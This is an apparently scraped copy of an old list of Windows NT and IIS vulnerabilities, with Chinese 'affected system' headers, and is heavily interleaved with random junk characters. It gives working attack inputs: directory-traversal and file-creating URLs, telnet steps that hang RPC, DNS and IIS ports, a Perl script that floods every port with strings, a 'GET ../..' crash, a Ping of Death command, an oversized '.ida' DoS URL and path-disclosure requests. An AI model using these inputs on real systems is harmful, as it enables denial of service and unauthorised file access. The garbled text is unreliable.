受影響系統(tǒng):4.0,iis 1.01 {& z) z0 n" L4 L; N2 z
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
0 y* o$ V* O3 E9 |8 b& D2 r1 G$ L. C6 Y6 M0 }) `' v+ l
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.5 G# b, c) B& h" B6 x/ P
9 G% E$ c( V' C j% W( W. t: Z1 W
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
& K9 O7 |0 A1 N2 q
5 C& E6 X% f" \--------------------------------------------------------------------
# K* Y, Q: z" F$ G4 C1 w8 s" ]6 y t
9 F$ _8 x2 a" X. T) F受影響系統(tǒng):4.08 ]% H6 E m1 u+ N' @& L3 T
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.! {- }) w& M0 Z4 x' O; O
+ ~* |, m' u4 r5 ]# i$ s
If the file 'target.bat' exists, the file will be truncated.
0 Y( D/ p( V& ?: Q. }6 P# r9 e9 G0 ~9 y* }* m1 g
6 v' {5 v! ~1 w: K2 z9 @. KA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.' ~0 z9 Z/ l- C3 P; v$ }
, A! |. d; i8 O V4 E----------------------------------------------------------------------* {* i, v' i. _ Z4 R4 w5 @
) A+ a2 ^; q8 b" I) K/ w
受影響系統(tǒng):3.51,4.0
; \! Q% E: y' R5 u* e6 w9 Y# DMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
( Z+ e) M, K7 q" Q! V
: z; H9 g7 O/ B7 YThe following steps;% b# l4 ~; F8 {) O
@4 l0 \* }' E$ d$ YTelnet to an NT 4.0 system on port 135
( ]; t; T' D0 @! {Type about 10 characters followed by a <CR> + }, y4 x. y) r4 Q4 u
Exit Telnet ; p: N$ x+ L; ? g8 J: G" j
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
r' a& p/ ~' o* h
4 k+ i; |$ [. T! ?' N* OWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
# I( k/ C7 o2 f+ j' j' l- ^, k. X6 e+ ~" g+ Z8 v( h# A/ ]
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.9 u/ o) n. @1 ]+ C3 p
$ F, E0 O9 @8 w5 H" V+ g
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning." F' L- K; f. L1 `3 T: }6 {
" U/ ?; m6 X$ sThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ l& @$ b+ J% [5 l
+ x5 i# y! g% ~* w3 v/*begin poke code*/
% U, O3 R& Y, Q5 C7 H; S8 O T$ @5 v1 P' o& Y* w
use Socket;
' E8 B" u: f. E+ Muse FileHandle;& H. F5 k9 L7 L. L9 R: Q- v) g
require "chat2.pl";0 g( `7 S/ X( [ d/ l6 N
) t1 j0 [ f3 {2 v/ _$systemname = $ARGV[0] && shift;
2 K% @- m4 M$ J
# S6 ?- s8 k! p9 f% N$verbose = 1; # tell me what you're hitting2 P: f% @4 p. J- @8 P
$knownports = 1; # don't hit known problem ports
4 d9 M6 {; M" L* \for ($port = $0; $port<65535; $port++) . V N& e/ |) I5 h4 l
{- J3 x. v V9 b5 @5 N( `
& [4 I8 y6 {! S
N c) e3 x/ {. f4 b
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
, f2 N% }! Y% Onext;
+ B" F2 x* O/ J: f}
" a% X# A& N! E. C* l$fh = chat::open_port($systemname, $port);
2 \+ y- E$ L3 w: \" p$ p7 Xchat::print ($fh,"This is about ten characters or more");
/ C0 p k* u, r( O2 @if ($verbose) {
# n$ J! e- A2 p e* Z- _print "Trying port: $port\n";
) ^0 N6 U% e- q# d) I L}
( E" Q% r2 Z5 Fchat::close($fh);
4 ?/ T3 C( i$ C# \/ o8 Q0 Z; U( t5 O: S; F4 G8 _& O, C/ ]0 h' b0 y
}3 c+ J3 B9 C, N" |7 {
9 E) ?" y+ y3 o& ^- Y) a' M1 o* R
j: Z+ K' m$ v/ D8 }$ U5 m P" L, A
/*end poke code*/
" ~/ m7 Q1 A7 ^9 j+ ?5 e0 w8 O: N4 r& [
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
3 a! t; R! p' I$ Z
" G% N! `: M9 U6 ?. K--------------------------------------------------------------------------------
8 F8 P% B4 {( q; T) _; j4 @0 k1 s3 c/ }& R- Y. q" W% ?
受影響系統(tǒng):4.0
% j. b9 R5 z a8 E8 k1 aUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.- G) Y) ^" T# e) Q
4 o3 x% U7 k7 GThis attack causes Dr. Watson to display an alert window and to log an error:
; `/ a4 Q6 ^, s8 o2 I$ J/ u2 i7 A: a5 S7 A. L
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"3 C1 L8 v7 }+ n
2 i- e9 C) _0 M0 k: W
--------------------------------------------------------------------------------
0 b% z5 m3 d6 Y) T5 x0 Y$ S- K; g
受影響系統(tǒng):3.51,4.0
3 R8 [7 u, d; o. a5 pLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
[6 f* c+ H+ ]! i8 o
}+ E9 H/ x3 k rSTOP: 0X0000001E
- ~, X! x/ \6 {! Z" t. nKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS6 @! F+ L* x4 v
, f1 \: d, ^! x1 H9 d; M
-OR-
( G* u; w! W+ T. c6 Y& B! H& l# v
/ J1 W# ~3 H, g6 {! @STOP: 0x0000000A
t3 R# S: c' r% @1 l. I3 XIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
* w* E# \( n$ Y9 T' ]2 k. c U( ]# A" Q- k- A
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
5 r7 c; ^2 R7 N1 z3 W9 H T, l: B
2 p' f# D9 y/ ^7 P5 Y--------------------------------------------------------------------------------
) ]/ \! G6 `4 ?" V& T: t8 K) ?) x# b. R* P& j# E ?6 |2 c
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
$ J7 A3 I- x! }5 l+ L6 Q) L0 ~& }
5 h' n' v3 B9 v$ Q* Z--------------------------------------------------------
8 A! ]3 ?: i; g
9 R/ c5 }* u" zIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |